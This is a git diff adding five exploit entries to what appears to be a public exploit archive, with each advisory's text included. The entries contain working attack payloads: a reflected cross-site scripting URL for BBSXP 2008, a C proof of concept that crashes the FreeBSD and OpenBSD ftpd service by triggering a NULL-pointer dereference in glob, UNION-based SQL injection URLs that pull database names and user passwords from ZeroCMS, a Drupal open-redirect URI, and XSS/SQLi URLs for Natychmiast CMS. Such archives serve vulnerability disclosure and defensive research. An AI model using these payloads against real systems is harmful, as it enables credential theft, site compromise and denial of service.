diff --git a/files.csv b/files.csv
index d5f1f5831..59d7c9d68 100755
--- a/files.csv
+++ b/files.csv
@@ -30357,3 +30357,8 @@ id,file,description,date,author,platform,type,port
 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
+33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
+33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
+33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
+33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0
+33709,platforms/php/webapps/33709.txt,"Natychmiast CMS Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0
diff --git a/platforms/asp/webapps/33704.txt b/platforms/asp/webapps/33704.txt
new file mode 100755
index 000000000..73e055766
--- /dev/null
+++ b/platforms/asp/webapps/33704.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/38542/info
+
+BBSXP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+BBSXP 2008 is vulnerable; other versions may also be affected.
+
+Home Page : http://www.bbsxp.com/
+
+
+i found a xss on "ThreadID" parameter in "ShowPost.asp" in BBSXP 2008 , it&#039;s "ShowPost.asp?ThreadID="
+
+for example:
+http://www.example.com/ShowPost.asp?ThreadID=1"><script>alert(/Liscker/);</script>
+
+We shouldnt encode the script, or, the xss will fail.
+
+
+
+
+Liscker
+
+2010.3.4 
diff --git a/platforms/bsd/dos/33708.c b/platforms/bsd/dos/33708.c
new file mode 100755
index 000000000..7708841c8
--- /dev/null
+++ b/platforms/bsd/dos/33708.c
@@ -0,0 +1,47 @@
+source: http://www.securityfocus.com/bid/38559/info
+
+The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
+
+Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+This issue affects the following releases:
+
+FreeBSD 8.0, 6.3, 4.9
+OpenBSD 4.5 and 4.6 
+
+#include <glob.h>
+#include <stdio.h>
+
+#define MAXUSRARGS      100
+#define MAXGLOBARGS     1000
+
+void do_glob() {
+        glob_t gl;
+        char **pop;
+
+        char buffer[256];
+        strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
+
+        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
+        memset(&gl, 0, sizeof(gl));
+        gl.gl_matchc = MAXGLOBARGS;
+        flags |= GLOB_LIMIT;
+        if (glob(buffer, flags, NULL, &gl)) {
+                printf("GLOB FAILED!\n");
+                return 0;
+        }
+        else
+//                for (pop = gl.gl_pathv; pop && *pop && 1 <
+(MAXGLOBARGS-1);
+                for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
+                     pop++) {
+                        printf("glob success");
+                        return 0;
+                }
+        globfree(&gl);
+}
+
+main(int argc, char **argv) {
+        do_glob();
+        do_glob();
+}
diff --git a/platforms/php/webapps/33702.txt b/platforms/php/webapps/33702.txt
new file mode 100755
index 000000000..225569cb9
--- /dev/null
+++ b/platforms/php/webapps/33702.txt
@@ -0,0 +1,36 @@
+?
+ZeroCMS 1.0 (article_id) SQL Injection Vulnerability
+
+
+Vendor: Another Awesome Stuff
+Product web page: http://www.aas9.in/zerocms/
+Affected version: 1.0
+
+Summary: ZeroCMS is a very simple Content Management
+System built using PHP and MySQL.
+
+Desc: Input passed via the 'article_id' GET parameter
+to zero_view_article.php script is not properly sanitised
+before being used in SQL queries. This can be exploited
+to manipulate SQL queries by injecting arbitrary SQL code.
+
+Tested on: Apache/2.4.7 (Win32)
+           PHP/5.5.6
+           MySQL 5.6.14
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2014-5186
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php
+
+
+09.06.2014
+
+--
+
+
+http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6--
+http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--
diff --git a/platforms/php/webapps/33706.txt b/platforms/php/webapps/33706.txt
new file mode 100755
index 000000000..af421da7b
--- /dev/null
+++ b/platforms/php/webapps/33706.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/38545/info
+
+Drupal is prone to multiple vulnerabilities, including cross-site scripting issues, a phishing issue, and a security-bypass issue.
+
+An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, bypass security restrictions, or perform other attacks.
+
+These issues affect the following:
+
+Drupal 5.x prior to 5.22
+Drupal 6.x prior to 6.16
+
+The following example URI is available for the redirect issue:
+
+http://www.example.com/drupal-6.16/index.php?q=http://www.example.net
+
diff --git a/platforms/php/webapps/33709.txt b/platforms/php/webapps/33709.txt
new file mode 100755
index 000000000..d306c8747
--- /dev/null
+++ b/platforms/php/webapps/33709.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/38561/info
+
+Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?id_str=[SQLi]
+http://www.example.com/a_index.php?id_str=[SQLi]
+http://www.example.com/index.php?id_str=&#039;%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
+http://www.example.com/a_index.php?id_str=&#039;%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
